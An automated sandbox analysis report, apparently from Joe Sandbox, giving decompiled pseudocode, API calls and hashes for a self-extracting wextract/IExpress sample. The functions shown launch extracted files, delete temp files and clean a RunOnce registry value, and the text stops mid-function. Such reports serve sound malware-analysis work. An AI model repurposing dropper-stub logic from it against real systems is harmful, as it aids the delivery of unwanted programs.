                                                          0x010c6c3e
                                                          0x010c6c3e
                                                          0x010c6abe
                                                          0x010c6abe
                                                          0x00000000

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CurrentImageInfoNonwritableSleepStartup_amsg_exit_initterm_ismbbleadexit
                                                          • String ID:
                                                          • API String ID: 359039474-0
                                                          • Opcode ID: cc99d7c88bd299f3347b04c2b9a043fceb351fd9d95f4e02e68a05b339a9bc9d
                                                          • Instruction ID: 41724d1c1c416049fe87cad2aad0b81fc874579e140672e19f3a30a4dc52b357
                                                          • Opcode Fuzzy Hash: cc99d7c88bd299f3347b04c2b9a043fceb351fd9d95f4e02e68a05b339a9bc9d
                                                          • Instruction Fuzzy Hash: EF41E471A44229DFDB719B6DD8047AE7BE5FB84F10F14805EE9C197381DB7A44808F94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 587 10c58c8-10c58d5 588 10c58d8-10c58dd 587->588 588->588 589 10c58df-10c58f1 LocalAlloc 588->589 590 10c5919-10c5959 call 10c1680 call 10c658a CreateFileA LocalFree 589->590 591 10c58f3-10c5901 call 10c44b9 589->591 594 10c5906-10c5910 call 10c6285 590->594 601 10c595b-10c596c CloseHandle GetFileAttributesA 590->601 591->594 600 10c5912-10c5918 594->600 601->594 602 10c596e-10c5970 601->602 602->594 603 10c5972-10c597b 602->603 603->600
                                                          C-Code - Quality: 95%
                                                          			E010C58C8(intOrPtr* __ecx) {
                                                          				void* _v8;
                                                          				intOrPtr _t6;
                                                          				void* _t10;
                                                          				void* _t12;
                                                          				void* _t14;
                                                          				signed char _t16;
                                                          				void* _t20;
                                                          				void* _t23;
                                                          				intOrPtr* _t27;
                                                          				CHAR* _t33;
                                                          
                                                          				_push(__ecx);
                                                          				_t33 = __ecx;
                                                          				_t27 = __ecx;
                                                          				_t23 = __ecx + 1;
                                                          				do {
                                                          					_t6 =  *_t27;
                                                          					_t27 = _t27 + 1;
                                                          				} while (_t6 != 0);
                                                          				_t36 = _t27 - _t23 + 0x14;
                                                          				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                          				if(_t20 != 0) {
                                                          					E010C1680(_t20, _t36, _t33);
                                                          					E010C658A(_t20, _t36, "TMP4351$.TMP");
                                                          					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                          					_v8 = _t10;
                                                          					LocalFree(_t20);
                                                          					_t12 = _v8;
                                                          					if(_t12 == 0xffffffff) {
                                                          						goto L4;
                                                          					} else {
                                                          						CloseHandle(_t12);
                                                          						_t16 = GetFileAttributesA(_t33); // executed
                                                          						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                          							goto L4;
                                                          						} else {
                                                          							 *0x10c9124 = 0;
                                                          							_t14 = 1;
                                                          						}
                                                          					}
                                                          				} else {
                                                          					E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          					L4:
                                                          					 *0x10c9124 = E010C6285();
                                                          					_t14 = 0;
                                                          				}
                                                          				return _t14;
                                                          			}













                                                          0x010c58cd
                                                          0x010c58d1
                                                          0x010c58d3
                                                          0x010c58d5
                                                          0x010c58d8
                                                          0x010c58d8
                                                          0x010c58da
                                                          0x010c58db
                                                          0x010c58e1
                                                          0x010c58ed
                                                          0x010c58f1
                                                          0x010c591e
                                                          0x010c592c
                                                          0x010c5943
                                                          0x010c594a
                                                          0x010c594d
                                                          0x010c5953
                                                          0x010c5959
                                                          0x00000000
                                                          0x010c595b
                                                          0x010c595c
                                                          0x010c5963
                                                          0x010c596c
                                                          0x00000000
                                                          0x010c5972
                                                          0x010c5974
                                                          0x010c597a
                                                          0x010c597a
                                                          0x010c596c
                                                          0x010c58f3
                                                          0x010c5901
                                                          0x010c5906
                                                          0x010c590b
                                                          0x010c5910
                                                          0x010c5910
                                                          0x010c5918

                                                          APIs
                                                          • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C58E7
                                                          • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5943
                                                          • LocalFree.KERNEL32(00000000,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C594D
                                                          • CloseHandle.KERNEL32(00000000,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C595C
                                                          • GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,010C5534,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 010C5963
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                          • API String ID: 747627703-3104274291
                                                          • Opcode ID: ec13480f9cd10c5db53ad5cecea1877c4b7db6b842318f2f8f3bda31674d62b4
                                                          • Instruction ID: 67879e8bdefe16bf2edc53a97a29725022607d088baccd56d1bc8b13e39e9ed6
                                                          • Opcode Fuzzy Hash: ec13480f9cd10c5db53ad5cecea1877c4b7db6b842318f2f8f3bda31674d62b4
                                                          • Instruction Fuzzy Hash: 46112671700215ABD7301F7A5C0CADF7E99EF8AAA4B10065DF5C6D32C5DA75A8058FA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 631 10c3fef-10c4010 632 10c410a-10c411a call 10c6ce0 631->632 633 10c4016-10c403b CreateProcessA 631->633 634 10c40c4-10c4101 call 10c6285 GetLastError FormatMessageA call 10c44b9 633->634 635 10c4041-10c406e WaitForSingleObject GetExitCodeProcess 633->635 647 10c4106 634->647 637 10c4070-10c4077 635->637 638 10c4091 call 10c411b 635->638 637->638 642 10c4079-10c407b 637->642 646 10c4096-10c40b8 CloseHandle * 2 638->646 642->638 645 10c407d-10c4089 642->645 645->638 648 10c408b 645->648 649 10c4108 646->649 650 10c40ba-10c40c0 646->650 647->649 648->638 649->632 650->649 651 10c40c2 650->651 651->647
                                                          C-Code - Quality: 84%
                                                          			E010C3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                          				signed int _v8;
                                                          				char _v524;
                                                          				long _v528;
                                                          				struct _PROCESS_INFORMATION _v544;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t20;
                                                          				void* _t22;
                                                          				int _t25;
                                                          				intOrPtr* _t39;
                                                          				signed int _t44;
                                                          				void* _t49;
                                                          				signed int _t50;
                                                          				intOrPtr _t53;
                                                          
                                                          				_t45 = __edx;
                                                          				_t20 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t20 ^ _t50;
                                                          				_t39 = __ecx;
                                                          				_t49 = 1;
                                                          				_t22 = 0;
                                                          				if(__ecx == 0) {
                                                          					L13:
                                                          					return E010C6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                          				}
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                          				if(_t25 == 0) {
                                                          					 *0x10c9124 = E010C6285();
                                                          					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                          					_t45 = 0x4c4;
                                                          					E010C44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                          					L11:
                                                          					_t49 = 0;
                                                          					L12:
                                                          					_t22 = _t49;
                                                          					goto L13;
                                                          				}
                                                          				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                          				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                          				_t44 = _v528;
                                                          				_t53 =  *0x10c8a28; // 0x0
                                                          				if(_t53 == 0) {
                                                          					_t34 =  *0x10c9a2c; // 0x0
                                                          					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                          						_t34 = _t44 & 0xff000000;
                                                          						if((_t44 & 0xff000000) == 0xaa000000) {
                                                          							 *0x10c9a2c = _t44;
                                                          						}
                                                          					}
                                                          				}
                                                          				E010C411B(_t34, _t44);
                                                          				CloseHandle(_v544.hThread);
                                                          				CloseHandle(_v544);
                                                          				if(( *0x10c9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                          					goto L12;
                                                          				} else {
                                                          					goto L11;
                                                          				}
                                                          			}


















                                                          0x010c3fef
                                                          0x010c3ffa
                                                          0x010c4001
                                                          0x010c4008
                                                          0x010c400a
                                                          0x010c400b
                                                          0x010c4010
                                                          0x010c410a
                                                          0x010c411a
                                                          0x010c411a
                                                          0x010c401c
                                                          0x010c401d
                                                          0x010c401e
                                                          0x010c401f
                                                          0x010c4033
                                                          0x010c403b
                                                          0x010c40ca
                                                          0x010c40e9
                                                          0x010c40f8
                                                          0x010c4101
                                                          0x010c4106
                                                          0x010c4106
                                                          0x010c4108
                                                          0x010c4108
                                                          0x00000000
                                                          0x010c4108
                                                          0x010c4049
                                                          0x010c405c
                                                          0x010c4062
                                                          0x010c4068
                                                          0x010c406e
                                                          0x010c4070
                                                          0x010c4077
                                                          0x010c407f
                                                          0x010c4089
                                                          0x010c408b
                                                          0x010c408b
                                                          0x010c4089
                                                          0x010c4077
                                                          0x010c4091
                                                          0x010c409c
                                                          0x010c40a8
                                                          0x010c40b8
                                                          0x00000000
                                                          0x010c40c2
                                                          0x00000000
                                                          0x010c40c2

                                                          APIs
                                                          • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,00000000), ref: 010C4033
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 010C4049
                                                          • GetExitCodeProcess.KERNELBASE ref: 010C405C
                                                          • CloseHandle.KERNEL32(?), ref: 010C409C
                                                          • CloseHandle.KERNEL32(?), ref: 010C40A8
                                                          • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 010C40DC
                                                          • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 010C40E9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 3183975587-0
                                                          • Opcode ID: 35deb9fc9cef67866b8bd6a1d304716878707c424cc3b096214d4e4eb4795e0a
                                                          • Instruction ID: 9acb1ea58e87c7b929565143024a0b0f61aedfe4dac52a43ad0b08248ed2ddae
                                                          • Opcode Fuzzy Hash: 35deb9fc9cef67866b8bd6a1d304716878707c424cc3b096214d4e4eb4795e0a
                                                          • Instruction Fuzzy Hash: DC319E31640218AFEB709B69DC4CFAB77B8EBD4B44F2001ADF985D2191DA3649818F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 652 10c51e5-10c520b call 10c468f LocalAlloc 655 10c522d-10c523c call 10c468f 652->655 656 10c520d-10c5228 call 10c44b9 call 10c6285 652->656 661 10c523e-10c5260 call 10c44b9 LocalFree 655->661 662 10c5262-10c5270 lstrcmpA 655->662 671 10c52b0 656->671 661->671 665 10c527e-10c529c call 10c44b9 LocalFree 662->665 666 10c5272-10c5273 LocalFree 662->666 674 10c529e-10c52a4 665->674 675 10c52a6 665->675 669 10c5279-10c527c 666->669 672 10c52b2-10c52b5 669->672 671->672 674->669 675->671
                                                          C-Code - Quality: 100%
                                                          			E010C51E5(void* __eflags) {
                                                          				int _t5;
                                                          				void* _t6;
                                                          				void* _t28;
                                                          
                                                          				_t1 = E010C468F("UPROMPT", 0, 0) + 1; // 0x1
                                                          				_t28 = LocalAlloc(0x40, _t1);
                                                          				if(_t28 != 0) {
                                                          					if(E010C468F("UPROMPT", _t28, _t29) != 0) {
                                                          						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                          						if(_t5 != 0) {
                                                          							_t6 = E010C44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                          							LocalFree(_t28);
                                                          							if(_t6 != 6) {
                                                          								 *0x10c9124 = 0x800704c7;
                                                          								L10:
                                                          								return 0;
                                                          							}
                                                          							 *0x10c9124 = 0;
                                                          							L6:
                                                          							return 1;
                                                          						}
                                                          						LocalFree(_t28);
                                                          						goto L6;
                                                          					}
                                                          					E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree(_t28);
                                                          					 *0x10c9124 = 0x80070714;
                                                          					goto L10;
                                                          				}
                                                          				E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x10c9124 = E010C6285();
                                                          				goto L10;
                                                          			}






                                                          0x010c51fb
                                                          0x010c5207
                                                          0x010c520b
                                                          0x010c523c
                                                          0x010c5268
                                                          0x010c5270
                                                          0x010c528b
                                                          0x010c5293
                                                          0x010c529c
                                                          0x010c52a6
                                                          0x010c52b0
                                                          0x00000000
                                                          0x010c52b0
                                                          0x010c529e
                                                          0x010c5279
                                                          0x00000000
                                                          0x010c527b
                                                          0x010c5273
                                                          0x00000000
                                                          0x010c5273
                                                          0x010c524a
                                                          0x010c5250
                                                          0x010c5256
                                                          0x00000000
                                                          0x010c5256
                                                          0x010c5219
                                                          0x010c5223
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F4D,?,00000002,00000000), ref: 010C5201
                                                          • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010C5250
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                          • String ID: <None>$UPROMPT
                                                          • API String ID: 957408736-2980973527
                                                          • Opcode ID: 3e760b4fee590bb4fa161e4f78a267cc1db410dee94870f44ccc4797798262af
                                                          • Instruction ID: 084d0384eab34208bae7267ea84b1d7d5fb4845876b112dc33b73ae8a5a2a9fd
                                                          • Opcode Fuzzy Hash: 3e760b4fee590bb4fa161e4f78a267cc1db410dee94870f44ccc4797798262af
                                                          • Instruction Fuzzy Hash: D011D0B9700205AFE3256B759C59B7FB1DEEBC9B84B10402DBAC2D6184EA7E9C004E24
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 74%
                                                          			E010C52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				signed int _t9;
                                                          				signed int _t11;
                                                          				void* _t21;
                                                          				void* _t29;
                                                          				CHAR** _t31;
                                                          				void* _t32;
                                                          				signed int _t33;
                                                          
                                                          				_t28 = __edi;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t9 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t9 ^ _t33;
                                                          				_push(__esi);
                                                          				_t31 =  *0x10c91e0; // 0xc282e0
                                                          				if(_t31 != 0) {
                                                          					_push(__edi);
                                                          					do {
                                                          						_t29 = _t31;
                                                          						if( *0x10c8a24 == 0 &&  *0x10c9a30 == 0) {
                                                          							SetFileAttributesA( *_t31, 0x80); // executed
                                                          							DeleteFileA( *_t31); // executed
                                                          						}
                                                          						_t31 = _t31[1];
                                                          						LocalFree( *_t29);
                                                          						LocalFree(_t29);
                                                          					} while (_t31 != 0);
                                                          					_pop(_t28);
                                                          				}
                                                          				_t11 =  *0x10c8a20; // 0x0
                                                          				_pop(_t32);
                                                          				if(_t11 != 0 &&  *0x10c8a24 == 0 &&  *0x10c9a30 == 0) {
                                                          					_push(_t22);
                                                          					E010C1781( &_v268, 0x104, _t22, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
                                                          					if(( *0x10c9a34 & 0x00000020) != 0) {
                                                          						E010C65E8( &_v268);
                                                          					}
                                                          					SetCurrentDirectoryA(".."); // executed
                                                          					_t22 =  &_v268;
                                                          					E010C2390( &_v268);
                                                          					_t11 =  *0x10c8a20; // 0x0
                                                          				}
                                                          				if( *0x10c9a40 != 1 && _t11 != 0) {
                                                          					_t11 = E010C1FE1(_t22); // executed
                                                          				}
                                                          				 *0x10c8a20 =  *0x10c8a20 & 0x00000000;
                                                          				return E010C6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                          			}












                                                          0x010c52b6
                                                          0x010c52b6
                                                          0x010c52b6
                                                          0x010c52c1
                                                          0x010c52c8
                                                          0x010c52cb
                                                          0x010c52cc
                                                          0x010c52d4
                                                          0x010c52d6
                                                          0x010c52d7
                                                          0x010c52de
                                                          0x010c52e0
                                                          0x010c52f2
                                                          0x010c52fa
                                                          0x010c52fa
                                                          0x010c5302
                                                          0x010c5305
                                                          0x010c530c
                                                          0x010c5312
                                                          0x010c5316
                                                          0x010c5316
                                                          0x010c5317
                                                          0x010c531c
                                                          0x010c531f
                                                          0x010c5333
                                                          0x010c5345
                                                          0x010c5351
                                                          0x010c5359
                                                          0x010c5359
                                                          0x010c5363
                                                          0x010c5369
                                                          0x010c536f
                                                          0x010c5374
                                                          0x010c5374
                                                          0x010c5381
                                                          0x010c5387
                                                          0x010c5387
                                                          0x010c538f
                                                          0x010c53a0

                                                          APIs
                                                          • SetFileAttributesA.KERNELBASE(00C282E0,00000080,?,00000000), ref: 010C52F2
                                                          • DeleteFileA.KERNELBASE(00C282E0), ref: 010C52FA
                                                          • LocalFree.KERNEL32(00C282E0,?,00000000), ref: 010C5305
                                                          • LocalFree.KERNEL32(00C282E0), ref: 010C530C
                                                          • SetCurrentDirectoryA.KERNELBASE(010C11FC,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\), ref: 010C5363
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 010C5334
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                          • API String ID: 2833751637-1193786559
                                                          • Opcode ID: e27145f2800356476e99eb0c97ca0d315e3f960901a445b0c67b572bb34fd7e7
                                                          • Instruction ID: b85c25af405366af5b602411d335f584510e4a09c95eaad7c8bd1ca7b14b2dd9
                                                          • Opcode Fuzzy Hash: e27145f2800356476e99eb0c97ca0d315e3f960901a445b0c67b572bb34fd7e7
                                                          • Instruction Fuzzy Hash: 1221D135600208DFEB719B28DD08BAD37F0BB54B44F14819DE8C657198DBBAA884CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C1FE1(void* __ecx) {
                                                          				void* _v8;
                                                          				long _t4;
                                                          
                                                          				if( *0x10c8530 != 0) {
                                                          					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                          					if(_t4 == 0) {
                                                          						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                          						return RegCloseKey(_v8);
                                                          					}
                                                          				}
                                                          				return _t4;
                                                          			}





                                                          0x010c1fee
                                                          0x010c2005
                                                          0x010c200d
                                                          0x010c2017
                                                          0x00000000
                                                          0x010c2020
                                                          0x010c200d
                                                          0x010c2029

                                                          APIs
                                                          • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010C538C,?,?,010C538C), ref: 010C2005
                                                          • RegDeleteValueA.KERNELBASE(010C538C,wextract_cleanup0,?,?,010C538C), ref: 010C2017
                                                          • RegCloseKey.ADVAPI32(010C538C,?,?,010C538C), ref: 010C2020
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CloseDeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                          • API String ID: 849931509-702805525
                                                          • Opcode ID: 82b218e2d9883565c263a0d8344fd48088886b6c6206e64d41e8372f39e857ac
                                                          • Instruction ID: 005e48ab9b69964d424e0b2833599d606075ecdd306d3040e9ef7f4c01290d87
                                                          • Opcode Fuzzy Hash: 82b218e2d9883565c263a0d8344fd48088886b6c6206e64d41e8372f39e857ac
                                                          • Instruction Fuzzy Hash: A3E01A30650218FFEB318B91AC0EF5D7A6AE700B80F20019ABA84A1066E7A65A10DF08
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C4CD0(char* __edx, long _a4, int _a8) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				int _t30;
                                                          				long _t32;
                                                          				signed int _t33;
                                                          				long _t35;
                                                          				long _t36;
                                                          				struct HWND__* _t37;
                                                          				long _t38;
                                                          				long _t39;
                                                          				long _t41;
                                                          				long _t44;
                                                          				long _t45;
                                                          				long _t46;
                                                          				signed int _t50;
                                                          				long _t51;
                                                          				char* _t58;
                                                          				long _t59;
                                                          				char* _t63;
                                                          				long _t64;
                                                          				CHAR* _t71;
                                                          				CHAR* _t74;
                                                          				int _t75;
                                                          				signed int _t76;
                                                          
                                                          				_t69 = __edx;
                                                          				_t29 =  *0x10c8004; // 0x4b13cf70
                                                          				_t30 = _t29 ^ _t76;
                                                          				_v8 = _t30;
                                                          				_t75 = _a8;
                                                          				if( *0x10c91d8 == 0) {
                                                          					_t32 = _a4;
                                                          					__eflags = _t32;
                                                          					if(_t32 == 0) {
                                                          						_t33 = E010C4E99(_t75);
                                                          						L35:
                                                          						return E010C6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                          					}
                                                          					_t35 = _t32 - 1;
                                                          					__eflags = _t35;
                                                          					if(_t35 == 0) {
                                                          						L9:
                                                          						_t33 = 0;
                                                          						goto L35;
                                                          					}
                                                          					_t36 = _t35 - 1;
                                                          					__eflags = _t36;
                                                          					if(_t36 == 0) {
                                                          						_t37 =  *0x10c8584; // 0x0
                                                          						__eflags = _t37;
                                                          						if(_t37 != 0) {
                                                          							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                          						}
                                                          						_t54 = 0x10c91e4;
                                                          						_t58 = 0x10c91e4;
                                                          						do {
                                                          							_t38 =  *_t58;
                                                          							_t58 =  &(_t58[1]);
                                                          							__eflags = _t38;
                                                          						} while (_t38 != 0);
                                                          						_t59 = _t58 - 0x10c91e5;
                                                          						__eflags = _t59;
                                                          						_t71 =  *(_t75 + 4);
                                                          						_t73 =  &(_t71[1]);
                                                          						do {
                                                          							_t39 =  *_t71;
                                                          							_t71 =  &(_t71[1]);
                                                          							__eflags = _t39;
                                                          						} while (_t39 != 0);
                                                          						_t69 = _t71 - _t73;
                                                          						_t30 = _t59 + 1 + _t71 - _t73;
                                                          						__eflags = _t30 - 0x104;
                                                          						if(_t30 >= 0x104) {
                                                          							L3:
                                                          							_t33 = _t30 | 0xffffffff;
                                                          							goto L35;
                                                          						}
                                                          						_t69 = 0x10c91e4;
                                                          						_t30 = E010C4702( &_v268, 0x10c91e4,  *(_t75 + 4));
                                                          						__eflags = _t30;
                                                          						if(__eflags == 0) {
                                                          							goto L3;
                                                          						}
                                                          						_t41 = E010C476D( &_v268, __eflags);
                                                          						__eflags = _t41;
                                                          						if(_t41 == 0) {
                                                          							goto L9;
                                                          						}
                                                          						_push(0x180);
                                                          						_t30 = E010C4980( &_v268, 0x8302); // executed
                                                          						_t75 = _t30;
                                                          						__eflags = _t75 - 0xffffffff;
                                                          						if(_t75 == 0xffffffff) {
                                                          							goto L3;
